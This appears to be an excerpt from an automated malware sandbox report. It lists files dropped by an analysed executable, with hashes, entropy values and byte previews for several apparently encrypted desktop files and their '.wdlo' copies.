SHA-512:	4CDD32EBC9FCF44CBD3E9EBCF48656AB376151D8649858FDE002C02D47C579A17E658BE22287AAEBDA6345F2372C2DE39CA62A63C409C388C7BDABB08D5E7E7F
Malicious:	false
Reputation:	unknown
Preview:	BPMLN....`.C.n..~.....W.FK..q...........9.9........m.c..'.U.'e.J.{...S..s...i.M..Gx.._.+%9.Jp....u.D3..2.dz..)?"O....s..tb.ur=q.S.%.9.YT.N..R.r.?..X'..I..y............[.j.z...P.....6Zv..2k.L..o.`.z.8a.]....Q...6.x.i.Prt.;7.=.j....#rv.]..{.!.!...4.f.p..C.!e.....$[....Yt..E...xe.V<.I"...f..........?.8....M&.Bjq1...h7..X.u.&Y.h.Mi..&k....\|.......<v8..B8..G.e..mn..HE.........f...g....n..L@.QL...d..M.....x.)g./2.[..c.1'Y.2........xI....k......o..s...k.H..L..x..@N6.a.,....Q..W..*....w...'.'..QDm...E.<....k...,\Nhn.4X.....4o.......vM.........?).....7....N-..+...#.....Q...O...n?.Q...X....`.....8wwzp..b..w^...T..>. .3..WbRp<.na.zL5.u.W...\|...8.3m<..o.bt. !A.{...D..+....^...D0^...Q..m6\|^~28p}.`...6)..a.&./.=6......0...$....1.....H..:A..J..j..uTi..V..y=......v.%1N.q...$\|.."..2e.......d..KB...+.f.`]NR....Zw....\|...3.J.i?;.V.....Du....+4.[N....!&(G.....sS>"..rvr.j.......Qf.d...6....A...AuB<.b.Uj .5.51-..F....S...\|.;R.....[..1y..B..0\.c.K.~..F.DzU'v....

C:\Users\user\Desktop\BPMLNOBVSB\CURQNKVOIX.pdf

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870451261882768
Encrypted:	false
SSDEEP:	24:dLnm60RMivCdT1pNnA+8PpOvgQCbOFjBjOoBPxeZdTCGh5xzleWFbD:dLnmPRMi6V1pNn5mIYQAOFdzBJeZd3lf
MD5:	301DAB24FEE8FF80424476D88BCF0510
SHA1:	52E644D8AC17E35CB9DD33149512CF83520BEC3C
SHA-256:	7913BEE80FF17E7A56B5DFE73832BC9A949C1AADCE5F756F48B0718B5C294A4B
SHA-512:	F4FB4D9522FAAF129EFB3A6785FC8D4AEAAC5B13AAD3BDF397CA137252614BB8A96F32DAAC9855112C81D213F0A334C5EB17CEBC5C09B0468D14D7E65230D515
Malicious:	false
Reputation:	unknown
Preview:	CURQN..j..1...]..V...-y.....6......./.m^.....i......B1.v.../P...MB..]....(..HJ.......SV/au..[.(<.h.9..p...C....i..$B..y.T~..O8..:......4...w\|SnG.9.?..O...v..5.'..Mg.~./..q..`.[c...d.W.........V.,........:d..<G.".B........> ".../.dL...............LS.A\...RuJ_......w..5T._y...Q.....T...c.Hz....I.a.r,..~F.E-..=.\?!v.......~...Vj]x.....=.br..t...D..K.2...z....c...........G..Z...:.........g..\0..j.c.CN....[..(..@U.(z&T3).mB........%..W.k.......^..L..y.1h..=l>a..\.r^-4@?.h%.+..Z.o.....s.fvp...6H.0.t....T.V.v..[...B..........>.^..g..)@..Q...S..g.[..!..V......).....U.....-q...t.o9.U2 .....y.6..B.m.'A..d.fI.XzJ.{.f.M1.E.I..#./.%.y.z.['l.!D...k...%.n....)./.x..L..II&.i...w.&..dk5c.....S;......Mj1.\.A..Oh.M............{...h..q.j?i.Y..-.S..H........../..S..E{..8v;."....a..P..,D}...'N>...{X.....T..A.\,%..{7....*?.{i....mu.]L....S.....p..5v.o....]Z'L.,.../.....H..:$UV.=a.j.M..y...0...+.7P...Q.;0...8...\.\|.N..1.....9.v...s....S&.c`.\|....&...:.

C:\Users\user\Desktop\BPMLNOBVSB\CURQNKVOIX.pdf.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870451261882768
Encrypted:	false
SSDEEP:	24:dLnm60RMivCdT1pNnA+8PpOvgQCbOFjBjOoBPxeZdTCGh5xzleWFbD:dLnmPRMi6V1pNn5mIYQAOFdzBJeZd3lf
MD5:	301DAB24FEE8FF80424476D88BCF0510
SHA1:	52E644D8AC17E35CB9DD33149512CF83520BEC3C
SHA-256:	7913BEE80FF17E7A56B5DFE73832BC9A949C1AADCE5F756F48B0718B5C294A4B
SHA-512:	F4FB4D9522FAAF129EFB3A6785FC8D4AEAAC5B13AAD3BDF397CA137252614BB8A96F32DAAC9855112C81D213F0A334C5EB17CEBC5C09B0468D14D7E65230D515
Malicious:	false
Reputation:	unknown
Preview:	CURQN..j..1...]..V...-y.....6......./.m^.....i......B1.v.../P...MB..]....(..HJ.......SV/au..[.(<.h.9..p...C....i..$B..y.T~..O8..:......4...w\|SnG.9.?..O...v..5.'..Mg.~./..q..`.[c...d.W.........V.,........:d..<G.".B........> ".../.dL...............LS.A\...RuJ_......w..5T._y...Q.....T...c.Hz....I.a.r,..~F.E-..=.\?!v.......~...Vj]x.....=.br..t...D..K.2...z....c...........G..Z...:.........g..\0..j.c.CN....[..(..@U.(z&T3).mB........%..W.k.......^..L..y.1h..=l>a..\.r^-4@?.h%.+..Z.o.....s.fvp...6H.0.t....T.V.v..[...B..........>.^..g..)@..Q...S..g.[..!..V......).....U.....-q...t.o9.U2 .....y.6..B.m.'A..d.fI.XzJ.{.f.M1.E.I..#./.%.y.z.['l.!D...k...%.n....)./.x..L..II&.i...w.&..dk5c.....S;......Mj1.\.A..Oh.M............{...h..q.j?i.Y..-.S..H........../..S..E{..8v;."....a..P..,D}...'N>...{X.....T..A.\,%..{7....*?.{i....mu.]L....S.....p..5v.o....]Z'L.,.../.....H..:$UV.=a.j.M..y...0...+.7P...Q.;0...8...\.\|.N..1.....9.v...s....S&.c`.\|....&...:.

C:\Users\user\Desktop\BPMLNOBVSB\RAYHIWGKDI.xlsx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843609072773148
Encrypted:	false
SSDEEP:	24:c31p+TFKTIiZdscFbo21fMWSi3prijS8M1aFn+yU/tmRRg4CJWFbD:UMxKsQVo2u5i3xijS8ujrtmRGxWVD
MD5:	F538E6C99212D1F99049B018E54034AA
SHA1:	FAA06555B3B764E865FB642DD4266F2CB3BD9D4E
SHA-256:	DCB4EFA8120E88FB8F0A192F547164F16C3067D784D170CFC433E676DCDF1437
SHA-512:	9FCB165B82AFE79ED88951E3BDB321FF130894591D5C3F0623A0D8B8AEF5507465E66EEB1248E179F42C2F8D75F548CD1D4050997D131767907AD84917278C95
Malicious:	false
Reputation:	unknown
Preview:	RAYHI.....;.sP..J......D;#.3.S..I ...S...0...[...<1....+N.?....E.N....Y.J....i.$....C..1j....Mp-@...4..B..ak...w ....0.\|qXt.......mOk....:../.............<.X..._#o.f.)Ws.#K..@./....,..$...,9J.D...c.....>:>...q...L..s...a..w..~0I....N.Q)..c4.U.....Y.....n.3.hO.d....s.....Q ..iH.i.....c.c...W....3..>[$.".....E'..<..x.8....G..iy}...........]..Q..[.Vd.0.~/..RI^..^Q+...n.....>T.s.!x].f../(]3\|"...c..s.N.h.iU)&....A=...}..mH.g&H.'..u%..6..B\D.8..h.8r.C..lj..y..m<n.B...._.N..G'I..H.<....m.._a.a..=."...B.h......nF.uD.(3.JM.\|.8?...R`....7...J6X.. .S0x.&......nQ.).4....h=+..#=..G.. .wq.l.{.`.l....V}..6..Y.!..c.....~....'.[.U...#s......n...<.=.g..S_9....Eo....@..P...5...wCQ..g...o.N...`..'..Y's.Z`..s.6..h...v........6.r.B.).x6...<Tx.C..~..5L.....E>.......=8......az...8.Mp.i'..L.:b.o9N<..N`....z.k..z..6..+.,..d.....!.;k8.......g....CoNX..t....P....yr'm...fjh.k....+R.WKu.I......-e....S.`Z\|1..G.~..\.nw.v1=...O.0(.R...Fj..z.#X..........<...8..P'...`l8~H

C:\Users\user\Desktop\BPMLNOBVSB\RAYHIWGKDI.xlsx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843609072773148
Encrypted:	false
SSDEEP:	24:c31p+TFKTIiZdscFbo21fMWSi3prijS8M1aFn+yU/tmRRg4CJWFbD:UMxKsQVo2u5i3xijS8ujrtmRGxWVD
MD5:	F538E6C99212D1F99049B018E54034AA
SHA1:	FAA06555B3B764E865FB642DD4266F2CB3BD9D4E
SHA-256:	DCB4EFA8120E88FB8F0A192F547164F16C3067D784D170CFC433E676DCDF1437
SHA-512:	9FCB165B82AFE79ED88951E3BDB321FF130894591D5C3F0623A0D8B8AEF5507465E66EEB1248E179F42C2F8D75F548CD1D4050997D131767907AD84917278C95
Malicious:	false
Reputation:	unknown
Preview:	RAYHI.....;.sP..J......D;#.3.S..I ...S...0...[...<1....+N.?....E.N....Y.J....i.$....C..1j....Mp-@...4..B..ak...w ....0.\|qXt.......mOk....:../.............<.X..._#o.f.)Ws.#K..@./....,..$...,9J.D...c.....>:>...q...L..s...a..w..~0I....N.Q)..c4.U.....Y.....n.3.hO.d....s.....Q ..iH.i.....c.c...W....3..>[$.".....E'..<..x.8....G..iy}...........]..Q..[.Vd.0.~/..RI^..^Q+...n.....>T.s.!x].f../(]3\|"...c..s.N.h.iU)&....A=...}..mH.g&H.'..u%..6..B\D.8..h.8r.C..lj..y..m<n.B...._.N..G'I..H.<....m.._a.a..=."...B.h......nF.uD.(3.JM.\|.8?...R`....7...J6X.. .S0x.&......nQ.).4....h=+..#=..G.. .wq.l.{.`.l....V}..6..Y.!..c.....~....'.[.U...#s......n...<.=.g..S_9....Eo....@..P...5...wCQ..g...o.N...`..'..Y's.Z`..s.6..h...v........6.r.B.).x6...<Tx.C..~..5L.....E>.......=8......az...8.Mp.i'..L.:b.o9N<..N`....z.k..z..6..+.,..d.....!.;k8.......g....CoNX..t....P....yr'm...fjh.k....+R.WKu.I......-e....S.`Z\|1..G.~..\.nw.v1=...O.0(.R...Fj..z.#X..........<...8..P'...`l8~H

C:\Users\user\Desktop\BPMLNOBVSB\VAMYDFPUND.mp3

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838039289417639
Encrypted:	false
SSDEEP:	24:L+N8ma7vx3KIVAP6Vih+FAzCwWu2daMYLBnEkiQAgQ9RVTmEIWFbD:L+O/3LG67rxnpipZLQf2WVD
MD5:	7242AB54B6F97BA4C044C846D4725D74
SHA1:	BA22FC884052CB2FBD1FDDC52E274A19E0394049
SHA-256:	C61F42B0ED0D850B7ECC7D0C6B6A626D29F4469803B220588151E2FFC1169D1C
SHA-512:	3FE7EBF49725117521251D9CBEE86B8854CA410441C22AF441312FC92F99F0690DBA59C88A89D27E3444FA11E3DD012056796858214DB7DC445D1C71B09BFC13
Malicious:	true
Reputation:	unknown
Preview:	VAMYDl.M.5.\...uI6....2..;...&..T.j.Q...)V..9.....I5.j(s4DI....U.....K?]<.#x.................\...h.WZ..Y:..J.P..Y..2.>..<K.......z..C.......Ip.?.......c..@x.[>,.F...S...f..nX.......D.3.6U..@F..oUe.Yjt-...@...+3.._^P.\..nr.H...W..._LE.f..A.\|....G. ...@D.uF/BZ:...:.p.%..pb~.^S./......p.....{..&.".[..%..(R.VQ#a.-V..QS....V...5;..Z\#....J6l1ZA..yo"..^.3..D\4m%f.u...x....n...%S.>.(...t..%.......F...e...o.....B....J............l.fl.c[......5x.+9..l..,)...2....qE...(...,..Vt....................$ou.&#O.]P{..@..0.. .M.8.{<t..r.....s....[..D.B.V....)...p0.....O..f_..\|-#l4n..@n.'.H..... .8.v]D...6\|..!\|B2W..\|F.~.).uZd.....U..O.PY.J..g.B.U...../.#.N...0"k(%y......DJx.#.~I(...F6.<.m.g...{. %....:>.T.bl_......uXIKi.L...]!]b....L..#.^.16...E.G.......s......,...\|.b..\...0H4.g.`...d.LX......4kl.8l/.b......s.+.b.../.c..:2}..M.2.B.. ....x3.e....r.K;...a].._.....K'....PL6o...{....].cJ-..[l..O.-F. .N.1p7V1...1..q..vO.C!#..Y....Mv@......=...u.a.`..m.......A..

C:\Users\user\Desktop\BPMLNOBVSB\VAMYDFPUND.mp3.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838039289417639
Encrypted:	false
SSDEEP:	24:L+N8ma7vx3KIVAP6Vih+FAzCwWu2daMYLBnEkiQAgQ9RVTmEIWFbD:L+O/3LG67rxnpipZLQf2WVD
MD5:	7242AB54B6F97BA4C044C846D4725D74
SHA1:	BA22FC884052CB2FBD1FDDC52E274A19E0394049
SHA-256:	C61F42B0ED0D850B7ECC7D0C6B6A626D29F4469803B220588151E2FFC1169D1C
SHA-512:	3FE7EBF49725117521251D9CBEE86B8854CA410441C22AF441312FC92F99F0690DBA59C88A89D27E3444FA11E3DD012056796858214DB7DC445D1C71B09BFC13
Malicious:	false
Reputation:	unknown
Preview:	VAMYDl.M.5.\...uI6....2..;...&..T.j.Q...)V..9.....I5.j(s4DI....U.....K?]<.#x.................\...h.WZ..Y:..J.P..Y..2.>..<K.......z..C.......Ip.?.......c..@x.[>,.F...S...f..nX.......D.3.6U..@F..oUe.Yjt-...@...+3.._^P.\..nr.H...W..._LE.f..A.\|....G. ...@D.uF/BZ:...:.p.%..pb~.^S./......p.....{..&.".[..%..(R.VQ#a.-V..QS....V...5;..Z\#....J6l1ZA..yo"..^.3..D\4m%f.u...x....n...%S.>.(...t..%.......F...e...o.....B....J............l.fl.c[......5x.+9..l..,)...2....qE...(...,..Vt....................$ou.&#O.]P{..@..0.. .M.8.{<t..r.....s....[..D.B.V....)...p0.....O..f_..\|-#l4n..@n.'.H..... .8.v]D...6\|..!\|B2W..\|F.~.).uZd.....U..O.PY.J..g.B.U...../.#.N...0"k(%y......DJx.#.~I(...F6.<.m.g...{. %....:>.T.bl_......uXIKi.L...]!]b....L..#.^.16...E.G.......s......,...\|.b..\...0H4.g.`...d.LX......4kl.8l/.b......s.+.b.../.c..:2}..M.2.B.. ....x3.e....r.K;...a].._.....K'....PL6o...{....].cJ-..[l..O.-F. .N.1p7V1...1..q..vO.C!#..Y....Mv@......=...u.a.`..m.......A..

C:\Users\user\Desktop\BPMLNOBVSB\WKXEWIOTXI.jpg

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861253745649802
Encrypted:	false
SSDEEP:	24:5XvsvhIaoF82hWEs9FRAJZFfrZIDPXm/R+o4hFUMcSE07ETQboAHZWFbD:Aale2hWEsJc+DP0R+9FUMnb76mHZWVD
MD5:	B60DEB9E3D3CEE228BF52919000E145C
SHA1:	4AAC5BE18C2D3C056A812BA581B888A1CA8792DF
SHA-256:	E382F6784E782069A6B584581FA00B0ADFD00F31A41EB8A96FC3A319BF9FBBC1
SHA-512:	8BE3637971B47D5FF254C988CF30A3190B1F7A50D232A82897E55D438453F98A1CDC14685F12294F81C1D29714218EC5EB3D64B826ECC8F933384802F67520D6
Malicious:	false
Reputation:	unknown
Preview:	WKXEWdn6...z...N5.=...!.M[c{...[.4..q,U..I?.H..si... ....c)DC[D....bXa..,..%.-.wP.....ip..).M...6y...r.s....>.....0.;...........f..u..m-.g.........W"...{r...K.jE&.R.A.....K%...B..\u.......@#......`HB......p.'.T.T@...Q....;.Say.<g..^@.....8...._.IN....j.M.`..M..g.....R.\.. ..n;]..........]..V.m6.~..y... ...`FU..?&c.g(..]k;.d.jx.. 8x..)..?....%..y2K.o.1.G....\4.:.%.N.Jy.7L@....5J..1..a.v.+....F..5.....^.N...e..d.!.....7a....V..l.....7O....M.'......[..-.Q-0...~..!.i...B...+.....XG..Y8....x.7.FL..3K.....V.(e.N.Ws[./r#.b.....C..Z....B..8...%.....gBs...J.gp(.....z..'...+.S<.....AS.=..hx;....O4f.N(..'.,A.g%...D..eZk.Ee@..Ew....r....Dc...#`G.4a.n.^....]...n@c&!......D...5...........0.c.;..OU-x)J)..-ug6Z..1....Q.2P.(..9.H.>..zo8.t...Y....-..Xj.T9...p.....V.Uy....zc.P...HL...FLQr)9!.H...{L~..'.....{..q.n.*.u.?..>.,......9d.P.t.........+\|...n.Ig..T!..<YpM.1m.]....b......f.............z9.....Y.k.N2..q'"J..$.....?....~... ..!.E.#..Z.HBA......'......`O..<.2

C:\Users\user\Desktop\BPMLNOBVSB\WKXEWIOTXI.jpg.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861253745649802
Encrypted:	false
SSDEEP:	24:5XvsvhIaoF82hWEs9FRAJZFfrZIDPXm/R+o4hFUMcSE07ETQboAHZWFbD:Aale2hWEsJc+DP0R+9FUMnb76mHZWVD
MD5:	B60DEB9E3D3CEE228BF52919000E145C
SHA1:	4AAC5BE18C2D3C056A812BA581B888A1CA8792DF
SHA-256:	E382F6784E782069A6B584581FA00B0ADFD00F31A41EB8A96FC3A319BF9FBBC1
SHA-512:	8BE3637971B47D5FF254C988CF30A3190B1F7A50D232A82897E55D438453F98A1CDC14685F12294F81C1D29714218EC5EB3D64B826ECC8F933384802F67520D6
Malicious:	false
Reputation:	unknown
Preview:	WKXEWdn6...z...N5.=...!.M[c{...[.4..q,U..I?.H..si... ....c)DC[D....bXa..,..%.-.wP.....ip..).M...6y...r.s....>.....0.;...........f..u..m-.g.........W"...{r...K.jE&.R.A.....K%...B..\u.......@#......`HB......p.'.T.T@...Q....;.Say.<g..^@.....8...._.IN....j.M.`..M..g.....R.\.. ..n;]..........]..V.m6.~..y... ...`FU..?&c.g(..]k;.d.jx.. 8x..)..?....%..y2K.o.1.G....\4.:.%.N.Jy.7L@....5J..1..a.v.+....F..5.....^.N...e..d.!.....7a....V..l.....7O....M.'......[..-.Q-0...~..!.i...B...+.....XG..Y8....x.7.FL..3K.....V.(e.N.Ws[./r#.b.....C..Z....B..8...%.....gBs...J.gp(.....z..'...+.S<.....AS.=..hx;....O4f.N(..'.,A.g%...D..eZk.Ee@..Ew....r....Dc...#`G.4a.n.^....]...n@c&!......D...5...........0.c.;..OU-x)J)..-ug6Z..1....Q.2P.(..9.H.>..zo8.t...Y....-..Xj.T9...p.....V.Uy....zc.P...HL...FLQr)9!.H...{L~..'.....{..q.n.*.u.?..>.,......9d.P.t.........+\|...n.Ig..T!..<YpM.1m.]....b......f.............z9.....Y.k.N2..q'"J..$.....?....~... ..!.E.#..Z.HBA......'......`O..<.2

C:\Users\user\Desktop\BPMLNOBVSB\ZTGJILHXQB.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859170509255626
Encrypted:	false
SSDEEP:	24:84xBYNCYFEi0rVu9KHnGA2JruCL1sBg5zeWTavy5d2LOvU4qhWFbD:RbYNdEi0Ru93A2JrRLaBlo5dnqhWVD
MD5:	0BF902A4129390F4DDF25D2991E55E67
SHA1:	27DC17480B959A0025420C08BB4BE41C36C2EE22
SHA-256:	A04CF876CB0F95DE34DE4D01AAAF028E71351121D3BA7305EACD9AAB8AFDB9BA
SHA-512:	F85B8C2188DCD83DC68EA7EBF9569D4CC16B3DA9154019AF885D277D463B28DA56BF55F46464FDD2AEF74793EFF8B0D312CB0690DB61E7B8CE4C26F9EA9B98F2
Malicious:	false
Reputation:	unknown
Preview:	ZTGJIA/.kWl.MHc.....IoZ...o;.1f..t9.\..X[..x..n.%.<..mw....-$..........G.>...=..27x....e..<.4.:.......6..S..[.r^[._'\|[....?..D.H.mB...._..2a..../\.)....".Y..d'.m.....U.:.g..5+>.f.N.(....CI....1-..sc.n..76...NF.....';.c.Z.;F.~.@L.N..\|...fP....pB.B...K.`.s.....{...+.E..e..f.w..x...G..t..~......l.:..W...HF$B..:..f.<..@..D{-:..k?.0..+..5.uC..Jk...@.C..r7.:.5.9..zmD../.D....gP..z....%Y..u.m...F.t%..U...!N...RU`u..... Zm}....1.'.c..v...K.K.j......?.k<..s..qa....T.".'HE.........-.U6_l?...X.`.RV.L.......L..P...Jv..^.(.K..hh.Bf.....O.&...\|RM............}....>..DB-...p....\m...p..8.f.g..\Q>.].P+......B/......A_q...,x.r..0.;hp...$.%.s$#U m..'L..{......By...B.Wb.GY:%..>.b[.lm......M..RJ...D.Z\...b....o.....9.s.n..?.........m.i.>...H(...G&N.Vg.Tq+....`d.#z....^0..ty...S..!0.....(.>.6$z.........2.B.G....3...b6.k.N....J...?....r.=......5...R4wI...V7..<X..n\|.[.8..._X..Nk.....Naz%...r...B.....W.>...R...).....^.2.g4..\|..3?n.0.I.k..f.,.....2..

C:\Users\user\Desktop\BPMLNOBVSB\ZTGJILHXQB.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859170509255626
Encrypted:	false
SSDEEP:	24:84xBYNCYFEi0rVu9KHnGA2JruCL1sBg5zeWTavy5d2LOvU4qhWFbD:RbYNdEi0Ru93A2JrRLaBlo5dnqhWVD
MD5:	0BF902A4129390F4DDF25D2991E55E67
SHA1:	27DC17480B959A0025420C08BB4BE41C36C2EE22
SHA-256:	A04CF876CB0F95DE34DE4D01AAAF028E71351121D3BA7305EACD9AAB8AFDB9BA
SHA-512:	F85B8C2188DCD83DC68EA7EBF9569D4CC16B3DA9154019AF885D277D463B28DA56BF55F46464FDD2AEF74793EFF8B0D312CB0690DB61E7B8CE4C26F9EA9B98F2
Malicious:	false
Reputation:	unknown
Preview:	ZTGJIA/.kWl.MHc.....IoZ...o;.1f..t9.\..X[..x..n.%.<..mw....-$..........G.>...=..27x....e..<.4.:.......6..S..[.r^[._'\|[....?..D.H.mB...._..2a..../\.)....".Y..d'.m.....U.:.g..5+>.f.N.(....CI....1-..sc.n..76...NF.....';.c.Z.;F.~.@L.N..\|...fP....pB.B...K.`.s.....{...+.E..e..f.w..x...G..t..~......l.:..W...HF$B..:..f.<..@..D{-:..k?.0..+..5.uC..Jk...@.C..r7.:.5.9..zmD../.D....gP..z....%Y..u.m...F.t%..U...!N...RU`u..... Zm}....1.'.c..v...K.K.j......?.k<..s..qa....T.".'HE.........-.U6_l?...X.`.RV.L.......L..P...Jv..^.(.K..hh.Bf.....O.&...\|RM............}....>..DB-...p....\m...p..8.f.g..\Q>.].P+......B/......A_q...,x.r..0.;hp...$.%.s$#U m..'L..{......By...B.Wb.GY:%..>.b[.lm......M..RJ...D.Z\...b....o.....9.s.n..?.........m.i.>...H(...G&N.Vg.Tq+....`d.#z....^0..ty...S..!0.....(.>.6$z.........2.B.G....3...b6.k.N....J...?....r.=......5...R4wI...V7..<X..n\|.[.8..._X..Nk.....Naz%...r...B.....W.>...R...).....^.2.g4..\|..3?n.0.I.k..f.,.....2..

C:\Users\user\Desktop\CURQNKVOIX.jpg

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845385901051113
Encrypted:	false
SSDEEP:	24:NOUsusTh+MLZKU8Kq2DSKcTQRBEXQ8qegggv0mH3dzp6qnEcaYY623XGvVjTWFbD:NWdoMLZViwDIQRBKQ8qegmudzRn3am9Y
MD5:	4E351473E3EC4DE9F7B7549AF3E7CD3C
SHA1:	8EC0B946BA51515ADE4002A923A99D0552047120
SHA-256:	956B6EDD62E24212212A42BBDCE7DE8F6C17CBE344D808244469A14E905FFA5A
SHA-512:	712A4E476A4DC9E6178A19F622C9E87FFE5FE425C61136324B5562749A2F3D19A0FF180AC5C4A3417631389A22AC4B0A794CADC68EF518AEB585D52FD71A4BE6
Malicious:	false
Reputation:	unknown
Preview:	CURQNc.J......:Fg&u-..u...J.!X.a.YgS!.oi..$....Q...`...U...z..#<.Vd.=..,qfS.-..5..l.8(.x.N.}....UF./...F.\.....UT.yb$..1..^B;.d.....xC....I.].c..y....}......V...;8..-.....`..S.{...../.....5&...6L.....}+a.s...'...'..P.6...).7..#..._[.U.=ZU./.a....c...'...{..Y.....k........B.D....5F^..n.?)..Unu.....S.S./.=.D..H....@........R..Q.oE[u{Df.`...".....#e.&.%....x.%...93q..Vg.).6.h...w.sAU.)....=..=..3....n..dvI.2......._.F=.~....G3..T...m....g2...VpA.L..E.). ..."V..t..2.J.(l..d0..U<...._......+T..EKg?Qa.[.9..{.iY....)?.a<._.]).b8.i...........tR.D.).CH..h....R...`..Yt...mfDz^..~[.3....s.Q.q.{E.m.~.%ri..[...G...R:.h9..>...&....p....`I..)...D.x4.?..Dv.M%..b$.:...\|d..p.Q.98..E.....-.^6.c.O{.....1........9.]..yY.dV....,.b.k...i?^.xg...wp....%...\qv.P.4...'..........sC..._..p1..`Su.n..hm..G}V.W.cw..lW...n..q... .Jr.S...<..h`Zz....zyn../...b..y.].d../......gxs..x..eD,8.5.RMx.=.6..Q......'...yR.$..e...S......4...F.;M....(..L\|3.5"...?.Pf...G....

C:\Users\user\Desktop\CURQNKVOIX.jpg.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845385901051113
Encrypted:	false
SSDEEP:	24:NOUsusTh+MLZKU8Kq2DSKcTQRBEXQ8qegggv0mH3dzp6qnEcaYY623XGvVjTWFbD:NWdoMLZViwDIQRBKQ8qegmudzRn3am9Y
MD5:	4E351473E3EC4DE9F7B7549AF3E7CD3C
SHA1:	8EC0B946BA51515ADE4002A923A99D0552047120
SHA-256:	956B6EDD62E24212212A42BBDCE7DE8F6C17CBE344D808244469A14E905FFA5A
SHA-512:	712A4E476A4DC9E6178A19F622C9E87FFE5FE425C61136324B5562749A2F3D19A0FF180AC5C4A3417631389A22AC4B0A794CADC68EF518AEB585D52FD71A4BE6
Malicious:	false
Reputation:	unknown
Preview:	CURQNc.J......:Fg&u-..u...J.!X.a.YgS!.oi..$....Q...`...U...z..#<.Vd.=..,qfS.-..5..l.8(.x.N.}....UF./...F.\.....UT.yb$..1..^B;.d.....xC....I.].c..y....}......V...;8..-.....`..S.{...../.....5&...6L.....}+a.s...'...'..P.6...).7..#..._[.U.=ZU./.a....c...'...{..Y.....k........B.D....5F^..n.?)..Unu.....S.S./.=.D..H....@........R..Q.oE[u{Df.`...".....#e.&.%....x.%...93q..Vg.).6.h...w.sAU.)....=..=..3....n..dvI.2......._.F=.~....G3..T...m....g2...VpA.L..E.). ..."V..t..2.J.(l..d0..U<...._......+T..EKg?Qa.[.9..{.iY....)?.a<._.]).b8.i...........tR.D.).CH..h....R...`..Yt...mfDz^..~[.3....s.Q.q.{E.m.~.%ri..[...G...R:.h9..>...&....p....`I..)...D.x4.?..Dv.M%..b$.:...\|d..p.Q.98..E.....-.^6.c.O{.....1........9.]..yY.dV....,.b.k...i?^.xg...wp....%...\qv.P.4...'..........sC..._..p1..`Su.n..hm..G}V.W.cw..lW...n..q... .Jr.S...<..h`Zz....zyn../...b..y.].d../......gxs..x..eD,8.5.RMx.=.6..Q......'...yR.$..e...S......4...F.;M....(..L\|3.5"...?.Pf...G....

C:\Users\user\Desktop\FENIVHOIKN.docx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856417488914284
Encrypted:	false
SSDEEP:	24:TpfASfX8f+rqQ89as4Ek7zlbYM0cWz0kf6dLjHQ2o/zcwzKHM0dciCzR3iXLMWFX:dASEzFXSd0tznf2PHS/AwzqeiCzR3iQo
MD5:	5894EDD7A376F83EC84757E23E999150
SHA1:	D1EC7428FE390EFF91B6657CCDC27576300DB4D1
SHA-256:	19FB63A131D756BD7298AC7B1FB660CC45EB95E61882BD9F033334D9682184AC
SHA-512:	FAE09380BD6B755D771184AD83DA8AA6E4D64B690E75FABDC9D009758CB3A45F6C77A9ED0F7F30766F607800297ABC5D66369AA3B2D623876FA40B7474AA4390
Malicious:	false
Reputation:	unknown
Preview:	FENIV.(..E.....3.J...;{.J..s...X..NlT.....Ki..D......tr./R.<5...]...>..;....k.@..(..oS\%..~...o.B......}k.9LS.~..K...oq=.&..=qC..IQ.%...4V.>....wB............z.._zj7.:..}$..'...z.,DD:.o.]6......./.u......ef.{..~.".,OZ.......@.'..x...^..>..B.C?....=Y...^....i.?!.....l....mqJV...c8...4.%i.....~&D.&.:....22....p=\|..;..>.H.#..D..~..,...z>.)..J.%x...Kl.xU.E.(h2.zf&u..@u....kf6;..C.)s.P..H<...)..D.O$.w!........U........?w>.^..w.~...Z.E{..c...W.[...K^...o......79+.....]eA._Dz.2.3.m<E..Ay..sm...P.s....k..:..m..g.]....C.!.}....V...c.,......e.)".......&.M...l.....b.N.Z..Q._-.\&.B.....+.x..K<.1..:.9R.`..u~............=}...'...0.....s..!..-.M....]...2..b_`...$.....M.....JBo.V6...F:. ..X...3....oA.}........O....l....b<.......+7.D......H.....80...d......>~.G`L..E.kjy.C%.....v.3..?..N...z..A..".o..(X(......n..'k....cJ....1..2.c..6..9...."c.t.+..3Z..a~.\...y..#.....v.n......k.W.-:.Y...9S........Q.,.@.X.}:..Ot.0....R.x./...m.."Q.....l&.

C:\Users\user\Desktop\FENIVHOIKN.docx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856417488914284
Encrypted:	false
